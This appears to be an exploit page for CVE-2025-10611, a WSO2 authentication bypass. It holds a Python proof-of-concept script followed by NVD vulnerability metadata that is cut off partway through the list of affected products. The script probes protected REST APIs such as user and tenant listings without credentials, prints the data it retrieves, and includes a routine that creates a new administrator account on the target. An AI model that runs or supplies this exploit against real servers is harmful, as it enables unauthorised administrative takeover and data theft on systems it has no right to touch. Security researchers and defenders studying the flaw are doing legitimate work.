CVE-2025-10611

#!/usr/bin/env python3 # CVE-2025-10611 - WSO2 REST API Access Control Bypass PoC # This PoC demonstrates how to exploit the insufficient access control # vulnerability in WSO2 products to access protected REST APIs without authentication. import requests import sys import json from urllib3.exceptions import InsecureRequestWarning # Disable SSL warnings requests.packages.urllib3.disable_warnings(InsecureRequestWarning) class WSO2Exploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json', 'Content-Type': 'application/json' }) def check_vulnerability(self): """Check if the target is vulnerable by accessing protected APIs without auth""" # Common WSO2 API endpoints that may be affected test_endpoints = [ '/api/server/v1/configs', '/api/server/v1/users', '/api/server/v1/tenants', '/carbon/admin/login.jsp', '/services/Version', '/api/am/publisher/v1/apis', '/t/carbon.super/api/server/v1/users' ] print(f"[*] Checking vulnerability on: {self.target_url}") for endpoint in test_endpoints: url = f"{self.target_url}{endpoint}" try: response = self.session.get(url, timeout=10) # If we get 200 OK without authentication, the target is vulnerable if response.status_code == 200: print(f"[+] VULNERABLE - Endpoint accessible without auth: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True, endpoint elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected (expected): {endpoint} - Status: {response.status_code}") else: print(f"[?] Unexpected response: {endpoint} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {endpoint}: {str(e)}") return False, None def exploit_admin_access(self, endpoint): """Attempt to gain administrative access through the vulnerable endpoint""" print(f"\n[*] Attempting to exploit: {endpoint}") # Attempt to list users url = f"{self.target_url}{endpoint}" response = self.session.get(url, timeout=10) if response.status_code == 200: print(f"[+] Successfully accessed protected resource!") try: data = response.json() print(f"[+] Retrieved data: {json.dumps(data, indent=2)[:500]}") except: print(f"[+] Raw response: {response.text[:500]}") return True return False def create_admin_user(self, tenant_path='/t/carbon.super'): """Attempt to create a new admin user via the vulnerable API""" url = f"{self.target_url}{tenant_path}/api/server/v1/users" payload = { "user": { "username": "poc_admin", "password": "P@ssw0rd!2025", "claims": [ {"uri": "http://wso2.org/claims/givenname", "value": "POC"}, {"uri": "http://wso2.org/claims/emailaddress", "value": "[email protected]"}, {"uri": "http://wso2.org/claims/lastname", "value": "Admin"} ], "profile": { "roles": [{"id": "internal/admin", "name": "admin"}] } } } try: response = self.session.post(url, json=payload, timeout=10) if response.status_code in [200, 201]: print(f"[+] Admin user created successfully!") return True else: print(f"[-] Failed to create user. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {str(e)}") return False def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} https://wso2.example.com:9443") sys.exit(1) target = sys.argv[1] exploit = WSO2Exploit(target) is_vulnerable, endpoint = exploit.check_vulnerability() if is_vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-10611") if endpoint: exploit.exploit_admin_access(endpoint) else: print("\n[-] Target does not appear to be vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-10611", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2025-10-16T13:15:40.640", "lastModified": "2025-11-21T21:38:23.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an insufficient access control implementation in multiple WSO2 Products, authentication and authorization checks for certain REST APIs can be bypassed, allowing them to be invoked without proper validation.\n\nSuccessful exploitation of this vulnerability could lead to a malicious actor gaining administrative access and performing unauthenticated and unauthorized administrative operations."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DEEA7DB5-BBF7-44A4-9FB6-0D235A44C680"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "245D4EB1-F69D-4FAF-94DB-F4B3D3C20539"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "6819491F-C6C3-41C1-B27A-0D0B62224977"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D57C8CF-084D-4142-9AF1-7C9F1261A3BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8FF14774-8935-4FC9-B5C8-9771B3D6EBFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1344FB79-0796-445C-A8F3-C03E995925D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E31E32CD-497E-4EF5-B3FC-8718EE06EDAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B58251E8-606B-47C8-8E50-9F9FC8C179BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "E21D7ABF-C328-425D-B914-618C7628220B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "51465410-6B7C-40FD-A1AB-A14F650A6AC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "851470CC-22AB-43E4-9CC6-5E22D49B3572"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EBAB99E-6F0F-4CE9-A954-E8878826304C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "0B3E6207-B2CF-487C-9CB8-906248B665C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "D47B760D-5418-4FB0-88F0-3F78BAFF63E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "0375C318-ECD2-4657-A0D7-4A0708266FBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DA0050E-D5DD-45E5-9F61-DC1BB060EFF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "26542F95-73F3-4906-838E-A66F5DC9DFA5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "60781FE4-38A3-4FEA-9D8B-CADE4B535974"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B169832-A746-49A6-8E92-06624AA9B13A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "981D701D-E381-484A-9614-CD0EF0331071"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4F126CA-A2F9-44F4-968B-DF71765869E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "2153AECE-020A-4C01-B2A6-F9F5D98E7EBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "32CE7893-AD1A-49E5-BD1A-5E9C2DEB8764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "EA76533A-5BED-4 ... (truncated)